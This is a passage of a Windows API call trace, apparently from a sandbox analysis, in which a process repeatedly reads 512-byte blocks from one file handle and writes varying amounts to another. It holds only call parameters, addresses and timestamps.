(in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.154] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.154] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x298, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.155] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.155] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.156] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.156] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.157] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.157] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x274, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.158] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.158] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x259, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.159] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.159] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.160] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.160] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x248, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.173] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x271, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.174] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.175] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x256, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.176] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.177] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.178] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.179] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.180] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.181] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.182] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.183] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x322, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.184] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x375, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.185] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2dc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.187] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.188] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.188] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x339, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.189] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.190] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.190] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x383, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.191] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.191] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.192] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.193] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x348, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.193] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.195] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.196] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.197] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x329, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.198] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x371, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.199] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.199] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.201] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.201] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.203] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.204] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.205] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2de, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.205] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.206] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.206] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3eb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.207] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.208] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.209] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.209] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.210] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.211] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.212] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x381, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, 